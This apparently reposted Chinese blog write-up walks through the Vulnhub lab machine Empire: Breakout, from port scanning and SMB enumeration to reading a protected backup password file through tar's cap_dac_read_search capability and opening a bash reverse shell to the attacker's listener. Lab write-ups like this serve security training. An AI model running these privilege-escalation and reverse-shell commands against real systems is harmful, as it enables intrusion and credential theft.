首页 > 其他分享 >Vulnhub靶机——EMPIRE: BREAKOUT

Vulnhub靶机——EMPIRE: BREAKOUT

时间:2024-04-08 14:30:54浏览次数:26  
标签:文件 shell tar 端口 BREAKOUT Vulnhub EMPIRE 权限 靶机

靶机地址

Empire: Breakout ~ VulnHub

渗透关键点

(1)tar文件具有可执行权,并且具备跨目录读取任意文件的特殊权限

(2)backups(备份文件)中存在信息敏感文件

渗透思路总结

(1)信息收集(端口信息,源码泄露,服务扫描)

(2)利用tar文件的特殊权限实现任意文件读取

(3)su登录失败则执行反弹shell

渗透流程

一、信息收集

(1)明确目标

        靶机IP(192.168.186.156)

        攻击机IP(192.168.186.135)

(2)端口扫描(开放端口、服务以及操作系统版本)

nmap -sV -p- -O 10.237.128.9

二、HTTP端口探测

1.80端口测试

(1)访问80端口(靶机IP+端口号)

(2)查看页面源码(观察是否有敏感信息泄露)

        特殊信息:brainfuck编码

(3)bringfuck编码解密(可能是密码)

.2uqPEfj3D<P'a-3

2.端口10000测试

(1)访问可能出现报错(http访问即可)

(2)10000端口是后台登录端

(3)源码检查

3.端口20000测试

(1)访问可能出现报错(http访问即可)

(2)20000端口是用户登录端

(3)源码检查

三、SMB服务探测

服务器开放smb服务,因此使用enum4linux进行针对SMB服务的信息收集

(enum4linux是SMB服务(文件共享协议)专用枚举型扫描器)(拿到用户名)

enum4linux -a 192.168.186.156

四、信息利用

(1)利用账号密码尝试登录平台

(2)成功登录20000端口的用户平台

(3)寻找可用功能点(左下角具备开启用户shell功能)

五、提权

(1)发现敏感文件tar,查看tar文件权限(具有可执行权)

ls -l tar

(2)getcap命令查看tar文件是否具备特殊权限

(特殊权限可以让特定文件在没有root权限情况下对其他文件进行特权操作)

getcap tar

(3)cap_dac_read_search:忽略文件读以及目录搜寻的限制

tar文件具有可执行权,并且具有跨目录读取任意文件的特殊权限

因此可以利用tar文件对重要信息文件进行打包再解压处理,从而实现绕过文件权限限制

(4)回到根目录搜寻信息文件(var/backups/目录下发现隐藏文件.old_pass.bak)

(5)直接访问,发现没有权限

(6)记录文件路径,回到tar文件所在目录下(不回到tar目录下的话是无法使用tar文件的)

        将.old_pass.bak文件压缩为yeah.tar文件包

./tar -cvf yeah.tar /var/backups/.old_pass.bak

(7)解压yeah文件包,实现权限绕过

        拿到root密码:Ts&4&YurgtRX(=~h

tar -xvf yeah.tar

(8)su登录失败,进行反弹shell处理

六、反弹shell

(1)开启监听端口

nc -lvp 6666

(2)靶机输入(bash -i >& /dev/tcp/kali的IP/监听端口号0>&1

bash -i >& /dev/tcp/192.168.186.135/6666 0>&1

(3)成功反弹shell,登陆root用户,提权成功

(4)反弹shell连接时候如果出现连接超时的情况

(排查靶机和攻击机的网关设置模式,同为NAT模式或者同为桥接模式)

标签:文件,shell,tar,端口,BREAKOUT,Vulnhub,EMPIRE,权限,靶机
From: https://blog.csdn.net/W13680336969/article/details/137507189

相关文章

  • Vulnhub之dc-3
    信息收集ip扫描端口扫描80访问目录扫描发现目录administrator这里我用Wappalyzer对他做了指纹识别,发现这个网站是用Joomla这个框架搭建的,这时候我们就要从这个框架身上下手,去寻找框架的漏洞。用到一个Joomla框架的扫描工具--joomscan,kali安装apt-getinstalljo......
  • 17、Connect-the-dots(VulnHub)
    Connect-the-dots一、nmapcatports|grepopen|awk-F'/''{print$1}'|paste-sd','>nmap_open_port_total.txt二、ftp渗透没啥三、web渗透随便看看图片隐写目录爆破没错,web端给我们的提示就是去找备份/backupsbootstrap.min.cs这个是啥c......
  • Vulnhub之Kdc-4
     IP扫描端口扫描80bp爆破adminhappy对command页面进行了下测试,发现这里存在一个命令执行 bp反弹shellkali监听在home/jim发现密码备份文件保存字典爆破ssh登录发现charles用户密码sudo-lteehee提权-隐念笎-博客园(cnblogs.com)......
  • Linux提权——SUID&SUDO(Vulnhub靶机)
    #简述1、SUID提权SUID是Linux中的一中特殊权限,SUID可以让二进制程序的调用者以文件拥有者的身份运行该文件。如果对于一些特殊命令设置了SUID,那么就会有被提权的风险。而这个SUID提权的关键就是,找到root用户所拥有的SUID的文件&命令,运行该文件或者调用命令时,暂时拥有root权限,......
  • Vulnhub之Kdc-5
     一信息收集IP扫描 端口扫描 80  文件包含 目录扫描 访问 漏洞验证 系统是nginx,所以可以查看一下日志信息,nginx日志的默认日志路劲为/var/log/nginx/,一般nginx的日志都有access.log和error.log文件访问 bp拦截 蚁剑连接  反弹sh......
  • 红队笔记10:pWnOS2.0打靶流程-whatweb指纹识别-searchsploit搜索漏洞利用getshell(vulnh
    目录开头:1.主机发现和端口扫描2.80端口- whatweb指纹识别-searchsploit搜索漏洞并利用whatweb指纹识别:searchsploit搜索历史漏洞:什么是perl?SimplePHPblog登录成功-图片上传getshell3.提权-敏感文件泄露密码泄露尝试登录 4.总结:开头:学习的视频是哔哩哔哩红......
  • 权限提升-Linux系统权限提升篇&Vulnhub&Capability能力&LD_Preload加载&数据库等
    知识点1、Web或用户到Linux-数据库类型2、Web或用户到Linux-Capability能力3、普通用户到Linux-LD_Preload加载so配合sudo章节点:1、Web权限提升及转移2、系统权限提升及转移3、宿主权限提升及转移4、域控权限提升及转移基础点0、为什么我们要学习权限提升转移技......
  • 权限提升-Linux系统权限提升篇&Vulnhub&PATH变量&NFS服务&Cron任务&配合SUID
    知识点1、Web或普通用户到Linux-服务安全配合SUID-NFS2、普通用户到Linux-环境变量配合SUID-$PATH3、Web或普通用户到Linux-计划任务权限不当-Cron章节点:1、Web权限提升及转移2、系统权限提升及转移3、宿主权限提升及转移4、域控权限提升及转移基础点0、为什么我......
  • Vulnhub之KiraCTF
    一信息收集IP扫描端口扫描80访问upload上传上传要求是图片点击两次发现url多了en.php感觉是文件包含二提权生成木马上传木马msf监听文件包含shell成功交互式shell发现bassam用户密码切换用户,发现用户直接拥有sudo的权限,并且在用户更根目录下......
  • Vulnhub之dc-6
    一信息收集IP扫描端口扫描访问80liux/etc/hosts访问成功页面信息插件目录扫描登录界面使用wpscan扫描一下用户用户字典选取带k01的字典进行扫爆破mark/helpdesk01登录二提权bp拦截kali监听写入交互式shell还有个22端口,可能有用发......